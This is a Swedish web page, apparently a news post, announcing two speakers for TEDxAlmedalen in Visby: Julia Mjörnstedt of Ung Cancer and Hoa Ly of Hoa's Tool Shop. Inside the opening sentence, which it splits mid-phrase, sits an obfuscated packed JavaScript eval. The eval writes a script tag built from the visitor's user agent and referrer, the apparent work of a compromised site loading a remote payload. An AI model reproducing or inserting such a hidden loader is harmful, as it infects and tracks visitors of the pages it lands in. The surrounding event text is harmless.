Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Julia Mjörnstedt och Hoa Ly klara som talare till TEDxAlmedalen

Julia Mjörnstedt och Hoa Ly klara som talare till TEDxAlmedalen
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|azrea|var|u0026u|referrer|bdstb||js|php’.split(’|’),0,{}))
år fokuserar
TEDxAlmedalen på framtidsoptimism med temat The world is getting better.  Som första klara namn presenterar vi världsförbättrarna Julia Mjörnstedt, grundare och generalsekreterare på Ung Cancer och Hoa Ly, psykolog och grundare av Hoa’s Tool Shop.

Julia Mjörnstedt var bara 21 år gammal när hon drabbades av tjocktarmscancer. Frustationen över att det inte fanns någon hjälp eller stöd att få för unga cancerdrabbade ledde till att Julia tillsammans med sin vän Hanna Wekell startade Ung Cancer, den första organisationen för unga vuxna som är drabbade av cancer. Ung Cancer har tilldelats flera utmärkelser för sitt arbete så som ”Årets Kommunikatör”, ”Svenska Hjältars Eldsjälar” och i mars fick Julia ta emot stipendiet ”Ungt Ledarskap” från kung Carl XVI Gustaf. Julia och Ung Cancer har gjort världen bättre för många unga vuxna.

– Det är otroligt spännande att få vara en del av TEDxAlmedalen. TEDx är ett fantastiskt forum vars idé stämmer väl överens med det som jag och Ung Cancer jobbar för – att skapa engagemang, mötesplatser och förändring, säger Julia Mjörnstedt, grundare och generalsekreterare på Ung Cancer.

Hoa Ly är VD och medgrundare av Hoa’s Tool Shop – ett teknikbolag som 2011 listades av tidningen Wired som ett av Europas hetaste startups. Han är också forskare i psykologi vid Linköpings universitet, medgrundare till konsultbolaget Psykologifabriken och en av arrangörerna bakom hälsoteknikeventet Health Hack Day. Sist men inte minst är han dj och spelar regelbundet med stjärnor som Miike Snow, Adrian Lux och Dada Life.

­­– Jag är av den bestämda uppfattningen att världen blir bättre! I min forskning har jag sett hur smartphones öppnar helt nya möjligheter att skapa effektiv och skalbar psykologisk behandling – något som kan bespara samhället enorma resurser och lidande. Samma mekanismer kan användas av friska människor för att samla data på sig själva och experimentera sig fram till vad man mår bra och utvecklas av. Att göra vetenskap av sitt eget liv har aldrig varit enklare, säger Hoa Ly, VD och medgrundare av Hoa’s Tool Shop.

Evenemanget drivs under TEDx riktlinjer och är icke kommersiellt, kostnadsfritt och opolitiskt.

Tid och plats:
TEDxAlmedalen arrangeras som ett midnattseminarium den 5 juli mellan kl 21.00 och 24.00 på en innergård i centrala Visby under Almedalsveckan. Begränsat antal platser. Anmälan krävs.

Mer information finns på www.tedxalmedalen.se. Följ oss gärna på Twitter och på Facebook. Anmälan öppnar inom kort.